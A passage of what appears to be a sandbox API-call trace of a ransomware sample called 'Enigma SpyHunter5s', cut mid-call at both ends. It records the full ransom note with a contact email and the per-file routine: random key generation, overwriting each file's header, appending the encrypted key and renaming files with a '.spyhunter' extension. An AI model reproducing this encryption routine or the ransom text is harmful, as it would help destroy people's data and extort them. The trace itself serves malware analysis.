dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.463] GetProcessHeap () returned 0x2c0000 [0146.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030470 | out: hHeap=0x2c0000) returned 1 [0146.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.463] GetProcessHeap () returned 0x2c0000 [0146.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30268 | out: hHeap=0x2c0000) returned 1 [0146.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\msdn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.463] GetProcessHeap () returned 0x2c0000 [0146.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffbbd8 | out: hHeap=0x2c0000) returned 1 [0146.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\msdn\\8.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.463] GetProcessHeap () returned 0x2c0000 [0146.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffdb28 | out: hHeap=0x2c0000) returned 1 [0146.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\mf\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.464] GetProcessHeap () returned 0x2c0000 [0146.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffbb20 | out: hHeap=0x2c0000) returned 1 [0146.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\media player\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0146.464] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.464] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed5b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ee84, lpOverlapped=0x0 | out: lpBuffer=0x270ed5b*, lpNumberOfBytesWritten=0x270ee84*=0x127, lpOverlapped=0x0) returned 1 [0146.465] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.465] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ee84, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ee84*=0x2ac, lpOverlapped=0x0) returned 1 [0146.465] CloseHandle (hObject=0xa0) returned 1 [0146.465] GetProcessHeap () returned 0x2c0000 [0146.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30303a8 | out: hHeap=0x2c0000) returned 1 [0146.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0146.466] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.466] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed57*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ee80, lpOverlapped=0x0 | out: lpBuffer=0x270ed57*, lpNumberOfBytesWritten=0x270ee80*=0x127, lpOverlapped=0x0) returned 1 [0146.467] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.467] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ee80, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ee80*=0x2ac, lpOverlapped=0x0) returned 1 [0146.467] CloseHandle (hObject=0xa0) returned 1 [0146.467] GetProcessHeap () returned 0x2c0000 [0146.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30302e0 | out: hHeap=0x2c0000) returned 1 [0146.467] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee20 | out: pbBuffer=0x270ee20) returned 1 [0146.467] GetProcessHeap () returned 0x2c0000 [0146.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0146.467] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee18*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee18*=0x30) returned 1 [0146.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0146.467] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned 56 [0146.467] StrStrW (lpFirst="ppcrlui.dll", lpSrch=".txt") returned 0x0 [0146.468] GetProcessHeap () returned 0x2c0000 [0146.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0146.468] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eddc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eddc*=0x2800, lpOverlapped=0x0) returned 1 [0146.723] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.723] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eddc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eddc*=0x2800, lpOverlapped=0x0) returned 1 [0146.724] GetProcessHeap () returned 0x2c0000 [0146.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0146.724] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.724] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eddc, lpOverlapped=0x0 | out: lpBuffer=0x270ee1c*, lpNumberOfBytesWritten=0x270eddc*=0x4, lpOverlapped=0x0) returned 1 [0146.816] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eddc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270eddc*=0x30, lpOverlapped=0x0) returned 1 [0146.816] CloseHandle (hObject=0xa0) returned 1 [0146.840] GetProcessHeap () returned 0x2c0000 [0146.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.840] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.spyhunter") returned 66 [0146.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlui.dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlui.dll.spyhunter")) returned 1 [0146.840] GetProcessHeap () returned 0x2c0000 [0146.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.841] GetProcessHeap () returned 0x2c0000 [0146.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0146.841] GetProcessHeap () returned 0x2c0000 [0146.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffda68 | out: hHeap=0x2c0000) returned 1 [0146.841] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee18 | out: pbBuffer=0x270ee18) returned 1 [0146.841] GetProcessHeap () returned 0x2c0000 [0146.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0146.841] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee10*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee10*=0x30) returned 1 [0146.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.868] GetProcessHeap () returned 0x2c0000 [0146.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0146.869] GetProcessHeap () returned 0x2c0000 [0146.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc19c0 | out: hHeap=0x2c0000) returned 1 [0146.869] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee18 | out: pbBuffer=0x270ee18) returned 1 [0146.869] GetProcessHeap () returned 0x2c0000 [0146.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0146.869] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee10*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee10*=0x30) returned 1 [0146.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.041] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 122 [0147.041] StrStrW (lpFirst="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0147.041] GetProcessHeap () returned 0x2c0000 [0147.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0147.041] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270edd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270edd4*=0x41d, lpOverlapped=0x0) returned 1 [0147.102] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbe3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.103] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x41d, lpNumberOfBytesWritten=0x270edd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270edd4*=0x41d, lpOverlapped=0x0) returned 1 [0147.103] GetProcessHeap () returned 0x2c0000 [0147.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0147.103] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.103] WriteFile (in: hFile=0x178, lpBuffer=0x270ee14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270edd4, lpOverlapped=0x0 | out: lpBuffer=0x270ee14*, lpNumberOfBytesWritten=0x270edd4*=0x4, lpOverlapped=0x0) returned 1 [0147.103] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270edd4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270edd4*=0x30, lpOverlapped=0x0) returned 1 [0147.103] CloseHandle (hObject=0x178) returned 1 [0147.103] GetProcessHeap () returned 0x2c0000 [0147.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.103] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter") returned 132 [0147.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter")) returned 1 [0147.104] GetProcessHeap () returned 0x2c0000 [0147.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.104] GetProcessHeap () returned 0x2c0000 [0147.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.104] GetProcessHeap () returned 0x2c0000 [0147.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f03c38 | out: hHeap=0x2c0000) returned 1 [0147.104] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee10 | out: pbBuffer=0x270ee10) returned 1 [0147.104] GetProcessHeap () returned 0x2c0000 [0147.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.105] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee08*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee08*=0x30) returned 1 [0147.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.105] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 82 [0147.105] StrStrW (lpFirst="Help_MKWD_BestBet.H1W", lpSrch=".txt") returned 0x0 [0147.105] GetProcessHeap () returned 0x2c0000 [0147.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0147.105] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270edcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270edcc*=0x2800, lpOverlapped=0x0) returned 1 [0147.133] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.133] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270edcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270edcc*=0x2800, lpOverlapped=0x0) returned 1 [0147.133] GetProcessHeap () returned 0x2c0000 [0147.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0147.133] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.133] WriteFile (in: hFile=0x178, lpBuffer=0x270ee0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270edcc, lpOverlapped=0x0 | out: lpBuffer=0x270ee0c*, lpNumberOfBytesWritten=0x270edcc*=0x4, lpOverlapped=0x0) returned 1 [0147.512] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270edcc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270edcc*=0x30, lpOverlapped=0x0) returned 1 [0147.512] CloseHandle (hObject=0x178) returned 1 [0147.512] GetProcessHeap () returned 0x2c0000 [0147.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.512] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.spyhunter") returned 92 [0147.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w.spyhunter")) returned 1 [0147.513] GetProcessHeap () returned 0x2c0000 [0147.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.513] GetProcessHeap () returned 0x2c0000 [0147.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.513] GetProcessHeap () returned 0x2c0000 [0147.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64d58 | out: hHeap=0x2c0000) returned 1 [0147.513] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee10 | out: pbBuffer=0x270ee10) returned 1 [0147.513] GetProcessHeap () returned 0x2c0000 [0147.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.513] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee08*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee08*=0x30) returned 1 [0147.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\D8UV.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\d8uv.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.514] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\D8UV.mkv") returned 84 [0147.514] StrStrW (lpFirst="D8UV.mkv", lpSrch=".txt") returned 0x0 [0147.514] GetProcessHeap () returned 0x2c0000 [0147.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.514] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270edcc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270edcc*=0x709, lpOverlapped=0x0) returned 1 [0147.514] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff8f7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.514] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x709, lpNumberOfBytesWritten=0x270edcc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270edcc*=0x709, lpOverlapped=0x0) returned 1 [0147.515] GetProcessHeap () returned 0x2c0000 [0147.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.515] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.515] WriteFile (in: hFile=0x178, lpBuffer=0x270ee0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270edcc, lpOverlapped=0x0 | out: lpBuffer=0x270ee0c*, lpNumberOfBytesWritten=0x270edcc*=0x4, lpOverlapped=0x0) returned 1 [0147.515] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270edcc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270edcc*=0x30, lpOverlapped=0x0) returned 1 [0147.515] CloseHandle (hObject=0x178) returned 1 [0147.515] GetProcessHeap () returned 0x2c0000 [0147.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.515] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\D8UV.mkv.spyhunter") returned 94 [0147.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\D8UV.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\d8uv.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\D8UV.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\d8uv.mkv.spyhunter")) returned 1 [0147.516] GetProcessHeap () returned 0x2c0000 [0147.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.516] GetProcessHeap () returned 0x2c0000 [0147.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.516] GetProcessHeap () returned 